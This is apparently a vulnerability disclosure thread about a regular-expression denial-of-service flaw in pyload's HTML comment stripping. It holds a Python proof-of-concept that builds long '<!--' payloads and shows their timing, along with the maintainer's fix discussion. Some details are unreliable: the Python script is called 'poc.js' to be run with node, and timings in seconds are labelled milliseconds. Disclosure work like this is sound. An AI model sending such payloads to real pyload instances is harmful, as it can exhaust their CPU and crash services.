Inefficient Regular Expression Complexity in pyload/pyload

Valid

Reported on

Sep 20th 2021


✍️ Description

The pyload package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide crafted HTML comments as input to the comments function of utils/web/purge.py may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L7 https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L12-L14

Put the below in a poc.js file and run with node

import time
import re
_RE_COMMENTS = re.compile(r"<!--.*?-->", flags=re.S)


def comments(value):
    """Removes HTML comments from a text string."""
    return _RE_COMMENTS.sub("", value).strip()

for i in range(1, 50000):
    start_time = time.perf_counter()
    payload = ""+"<!--"*(i*10000)+"-"
    comments(payload)
    stop_time = time.perf_counter() - start_time
    print("Payload.length: " + str(len(payload)) + ": " + str(stop_time) + " ms")

Check the Output:

Payload.length: 40001: 2.9121267 ms
Payload.length: 80001: 10.2797351 ms
Payload.length: 120001: 27.080219800000002 ms
Payload.length: 160001: 45.3576031 ms
Payload.length: 200001: 66.31825060000001 ms
--
--

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurrences

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Z-Old
a year ago

Admin


Hey ready-research, I've emailed the maintainers for you.

We have contacted a member of the pyload team and are waiting to hear back a year ago
pyload/pyload maintainer
a year ago

Hello, I got your email, How do you suggest to fix this issue?

ready-research submitted a
a year ago
ready-research
a year ago

Researcher


@maintainer Submitted a patch.

Please validate this issue using Mark as valid and also please confirm the fix once it got merged.

pyload/pyload maintainer validated this vulnerability a year ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
pyload/pyload maintainer
a year ago

@ready-research Where is the patch?

ready-research
a year ago

Researcher


You can select my branch fix-redos.

@admin Can you please guide the maintainer?

Jamie Slome
a year ago

Admin


@mainainer - please click the confirm fix button above, and follow the steps in the modal form.

When selecting who fixed the vulnerability, feel free to elect @ready-research.

ready-research submitted a
a year ago
pyload/pyload maintainer confirmed that a fix has been merged on 0ff11b a year ago
ready-research has been awarded the fix bounty
purge.py#L7 has been validated
to join this conversation